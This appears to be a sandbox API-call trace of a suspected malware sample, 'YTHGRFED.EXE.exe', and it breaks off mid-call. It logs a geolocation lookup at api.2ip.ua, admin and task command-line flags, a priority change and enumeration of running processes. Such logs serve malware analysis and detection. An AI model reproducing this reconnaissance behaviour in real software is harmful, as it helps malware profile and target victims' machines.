lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x631448, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0106.448] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6314c0, Size=0x84) returned 0x6314c0 [0106.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0106.448] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1e) returned 0x62eb68 [0106.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x62eb68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0106.449] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6314c0, Size=0x88) returned 0x6314c0 [0106.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0106.449] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2a) returned 0x62ae28 [0106.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x62ae28, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0106.449] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6314c0, Size=0x8c) returned 0x6314c0 [0106.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0106.449] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x12) returned 0x631468 [0106.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x631468, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0106.449] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6314c0, Size=0x90) returned 0x6314c0 [0106.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0106.449] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x631558 [0106.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x631558, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0106.449] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6314c0, Size=0x94) returned 0x631578 [0106.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0106.449] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x46) returned 0x6268c0 [0106.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x6268c0, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0106.449] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631578, Size=0x98) returned 0x631578 [0106.590] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x630af0) returned 0x80 [0106.590] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x630af0) returned 0x80 [0106.590] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x630af0) returned 0x80 [0106.601] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x8ec) returned 0x631618 [0106.682] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x630af0) returned 0x80 [0106.683] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x62e300 [0106.683] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x630af0) returned 0x80 [0106.683] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x630af0) returned 0x80 [0106.684] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x630af0) returned 0x80 [0106.798] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x630af0) returned 0x80 [0106.805] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0107.200] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x625790 [0107.200] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0108.489] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18b6e8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18dee8 | out: lpBuffer=0x18b6e8*, lpdwNumberOfBytesRead=0x18dee8*=0x1d1) returned 1 [0108.490] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0108.491] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0108.491] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x63d4e8 [0108.497] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1e0) returned 0x660348 [0108.502] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x660348 | out: hHeap=0x610000) returned 1 [0108.508] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63d4e8 | out: hHeap=0x610000) returned 1 [0108.508] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x625790 | out: hHeap=0x610000) returned 1 [0108.508] GetCurrentProcess () returned 0xffffffff [0108.508] GetLastError () returned 0x2 [0108.508] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0108.514] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x65f4b0 [0108.514] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x8ec) returned 0x322eca8 [0108.519] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x800) returned 0x322f5a0 [0108.519] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x322f5a0, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ythgrfed.exe.exe")) returned 0x36 [0108.520] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0108.525] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x810) returned 0x322fda8 [0108.525] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe\" --Admin IsNotAutoStart IsNotTask" [0108.525] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18dfc8 | out: pNumArgs=0x18dfc8) returned 0x6d6fd8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" [0108.526] lstrcpyW (in: lpString1=0x18ec58, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" [0108.526] lstrcmpW (lpString1="IsAutoStart", lpString2="IsNotAutoStart") returned -1 [0108.526] lstrcmpW (lpString1="IsTask", lpString2="IsNotTask") returned 1 [0108.531] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe\" --Admin IsNotAutoStart IsNotTask" [0108.532] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18df64 | out: pNumArgs=0x18df64) returned 0x6d6fd8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" [0108.532] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe") returned="YTHGRFED.EXE.exe" [0108.532] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0108.532] GetProcAddress (hModule=0x76e10000, lpProcName="EnumProcesses") returned 0x0 [0108.532] GetProcAddress (hModule=0x76e10000, lpProcName="EnumProcessModules") returned 0x0 [0108.533] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleBaseNameW") returned 0x0 [0108.533] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x74fe0000 [0108.577] GetProcAddress (hModule=0x74fe0000, lpProcName="EnumProcesses") returned 0x74fe1544 [0108.577] GetProcAddress (hModule=0x74fe0000, lpProcName="EnumProcessModules") returned 0x74fe1408 [0108.577] GetProcAddress (hModule=0x74fe0000, lpProcName="GetModuleBaseNameW") returned 0x74fe152c [0108.577] EnumProcesses (in: lpidProcess=0x183760, cb=0xa000, lpcbNeeded=0x18df70 | out: lpidProcess=0x183760, lpcbNeeded=0x18df70) returned 1 [0108.586] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0108.586] CloseHandle (hObject=0x0) returned 0 [0108.586] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0108.587] CloseHandle (hObject=0x0) returned 0 [0108.587] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0108.587] CloseHandle (hObject=0x0) returned 0 [0108.587] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0108.587] CloseHandle (hObject=0x0) returned 0 [0108.587] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0108.587] CloseHandle (hObject=0x0) returned 0 [0108.587] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0108.587] CloseHandle (hObject=0x0) returned 0 [0108.587] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0108.587] CloseHandle (hObject=0x0) returned 0 [0108.587] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0108.587] CloseHandle (hObject=0x0) returned 0 [0108.587] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0108.587] CloseHandle (hObject=0x0) returned 0 [0108.587] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0108.587] CloseHandle (hObject=0x0) returned 0 [0108.587] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0108.587] CloseHandle (hObject=0x0) returned 0 [0108.587] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0108.587] CloseHandle (hObject=0x0) returned 0 [0108.587] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0108.587] CloseHandle (hObject=0x0) returned 0 [0108.588] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0108.588] CloseHandle (hObject=0x0) returned 0 [0108.588] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0108.588] CloseHandle (hObject=0x0) returned 0 [0108.588] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0108.588] CloseHandle (hObject=0x0) returned 0 [0108.588] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0108.588] CloseHandle (hObject=0x0) returned 0 [0108.588] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0108.588] CloseHandle (hObject=0x0) returned 0 [0108.588] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x5a0 [0108.588] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 0 [0108.588] CloseHandle (hObject=0x5a0) returned 1 [0108.588] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5a0 [0108.588] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 0 [0108.588] CloseHandle (hObject=0x5a0) returned 1 [0108.588] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x46c) returned 0x0 [0108.589] CloseHandle (hObject=0x0) returned 0 [0108.589] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4a8) returned 0x5a0 [0108.589] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 0 [0108.589] CloseHandle (hObject=0x5a0) returned 1 [0108.589] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c4) returned 0x0 [0108.589] CloseHandle (hObject=0x0) returned 0 [0108.589] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x530) returned 0x5a0 [0108.589] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 0 [0108.589] CloseHandle (hObject=0x5a0) returned 1 [0108.589] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x720) returned 0x0 [0108.589] CloseHandle (hObject=0x0) returned 0 [0108.589] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5cc) returned 0x0 [0108.589] CloseHandle (hObject=0x0) returned 0 [0108.589] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x674) returned 0x0 [0108.589] CloseHandle (hObject=0x0) returned 0 [0108.589] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x738) returned 0x0 [0108.589] CloseHandle (hObject=0x0) returned 0 [0108.590] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc0) returned 0x5a0 [0108.590] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.591] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x260000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="dsc.exe") returned 0x7 [0108.591] CloseHandle (hObject=0x5a0) returned 1 [0108.591] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x764) returned 0x5a0 [0108.591] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.592] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x880000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="spider.exe") returned 0xa [0108.592] CloseHandle (hObject=0x5a0) returned 1 [0108.592] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x678) returned 0x5a0 [0108.593] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.594] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x160000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="gorgeousmart.exe") returned 0x10 [0108.594] CloseHandle (hObject=0x5a0) returned 1 [0108.594] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c8) returned 0x5a0 [0108.594] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.595] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xb90000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="sub.exe") returned 0x7 [0108.595] CloseHandle (hObject=0x5a0) returned 1 [0108.595] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x35c) returned 0x5a0 [0108.595] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.596] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x890000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="sink wrote.exe") returned 0xe [0108.596] CloseHandle (hObject=0x5a0) returned 1 [0108.597] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3a4) returned 0x5a0 [0108.597] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.598] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x11d0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="cant-created-milan.exe") returned 0x16 [0108.598] CloseHandle (hObject=0x5a0) returned 1 [0108.598] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x174) returned 0x5a0 [0108.598] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.599] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1250000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="extensionsremedyconventional.exe") returned 0x20 [0108.599] CloseHandle (hObject=0x5a0) returned 1 [0108.599] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x424) returned 0x5a0 [0108.599] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.600] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xa30000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="aimsresource.exe") returned 0x10 [0108.601] CloseHandle (hObject=0x5a0) returned 1 [0108.601] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x594) returned 0x5a0 [0108.601] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.602] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xa10000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="particles.exe") returned 0xd [0108.602] CloseHandle (hObject=0x5a0) returned 1 [0108.602] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x688) returned 0x5a0 [0108.602] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.603] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xb0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="we_spirituality.exe") returned 0x13 [0108.603] CloseHandle (hObject=0x5a0) returned 1 [0108.603] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x478) returned 0x5a0 [0108.603] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.604] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x830000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="strips_transmission_dialogue.exe") returned 0x20 [0108.605] CloseHandle (hObject=0x5a0) returned 1 [0108.605] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7f0) returned 0x5a0 [0108.605] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.606] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x3a0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="traveller_chevrolet.exe") returned 0x17 [0108.606] CloseHandle (hObject=0x5a0) returned 1 [0108.606] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x80c) returned 0x5a0 [0108.606] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.607] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x350000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="including.exe") returned 0xd [0108.607] CloseHandle (hObject=0x5a0) returned 1 [0108.607] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x81c) returned 0x5a0 [0108.607] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.608] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1220000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="safari_hungary.exe") returned 0x12 [0108.609] CloseHandle (hObject=0x5a0) returned 1 [0108.609] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x82c) returned 0x5a0 [0108.609] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.610] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x960000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="methods.exe") returned 0xb [0108.610] CloseHandle (hObject=0x5a0) returned 1 [0108.610] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x83c) returned 0x5a0 [0108.610] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.611] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xd40000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="kansas-cleveland-textiles.exe") returned 0x1d [0108.611] CloseHandle (hObject=0x5a0) returned 1 [0108.611] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x84c) returned 0x5a0 [0108.611] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.613] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xd90000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="destroy-pressed.exe") returned 0x13 [0108.613] CloseHandle (hObject=0x5a0) returned 1 [0108.613] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x85c) returned 0x5a0 [0108.613] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.614] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xd00000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="sheriff obtain.exe") returned 0x12 [0108.614] CloseHandle (hObject=0x5a0) returned 1 [0108.614] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x86c) returned 0x5a0 [0108.614] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.615] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x910000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="pockets_lower_rec.exe") returned 0x15 [0108.616] CloseHandle (hObject=0x5a0) returned 1 [0108.616] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x87c) returned 0x5a0 [0108.616] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.617] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xa10000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="deutschland although language.exe") returned 0x21 [0108.618] CloseHandle (hObject=0x5a0) returned 1 [0108.618] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x88c) returned 0x5a0 [0108.618] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.619] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xc10000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0108.619] CloseHandle (hObject=0x5a0) returned 1 [0108.619] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x89c) returned 0x5a0 [0108.619] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.620] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1250000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0108.620] CloseHandle (hObject=0x5a0) returned 1 [0108.620] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ac) returned 0x5a0 [0108.620] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0108.621] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x190000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0108.622] CloseHandle (hObject=0x5a0) returned 1 [0108.622] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8bc) returned 0x5a0 [0108.622] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: 